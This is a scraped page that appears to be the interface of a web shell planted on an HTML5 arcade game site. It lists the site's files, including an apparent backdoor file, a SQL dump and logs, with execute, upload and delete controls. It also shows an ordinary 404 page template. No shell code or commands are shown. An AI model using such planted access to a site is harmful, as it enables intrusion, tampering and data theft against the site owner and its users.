home
/
aioutajg
/
watermelongame.site
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] admin
N/A
[DIR] includes
N/A
[DIR] static
N/A
.htaccess
601 bytes
Rename
Delete
0u.php
37.68 KB
Rename
Delete
404.php
1.52 KB
Rename
Delete
Zontal-v1.5.zip
13.65 MB
Rename
Delete
archive.php
6.31 KB
Rename
Delete
category.php
5.03 KB
Rename
Delete
error_log
14.30 MB
Rename
Delete
index.php
15.67 KB
Rename
Delete
login.php
4.56 KB
Rename
Delete
logout.php
89 bytes
Rename
Delete
page.php
1.38 KB
Rename
Delete
register.php
8.32 KB
Rename
Delete
robots.txt
699 bytes
Rename
Delete
search.php
5.74 KB
Rename
Delete
single.php
13.76 KB
Rename
Delete
sitemap.php
1.23 KB
Rename
Delete
update_game_descriptions.php
23.55 KB
Rename
Delete
update_game_titles.php
1.18 KB
Rename
Delete
user.php
10.64 KB
Rename
Delete
zontal.sql
736.31 KB
Rename
Delete
<?php // +------------------------------------------------------------------------+ // | @author: MvnThemes // | @name: Zontal - The Arcade Online HTML5 Game Playing Platform // | @author_email: mvk62015@gmail.com // | @version: 1.0v // +------------------------------------------------------------------------+ // | Zontal - The Arcade Online HTML5 Game Playing Platform // | Copyright (c) 2017 Zontal. All rights reserved. // ?> <?php // Include Header ?> <?php include("includes/header.php") ?> <?php // Include Main Header ?> <?php include("includes/main-h.php") ?> <?php // Body Start ?> <body class="bg-dark dark:bg-[#121317]"> <div class="container-zon flex justify-center items-center h-[80vh]"> <div class="error-card card relative overflow-hidden rounded-xl cursor-pointer transition-all duration-300 hover:shadow-lg"> <div class="card-body p-6 text-center"> <h1 class="text-8xl font-bold dark:text-gray-300 text-zinc-800">404</h1> <h2 class="text-2xl font-bold dark:text-gray-300 text-zinc-800 mt-4">Page Not Found</h2> <p class="text-gray-500 dark:text-gray-400 text-sm mt-2">The page you are looking for does not exist.</p> <a href="<?php echo $site_url ?>" class="block mt-4 bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-700 transition-all duration-300">Go Back Home</a> </div> </div> </div> </body> <?php // Body End ?> <?php // Include Footer ?> <?php include("includes/footer.php") ?>
Save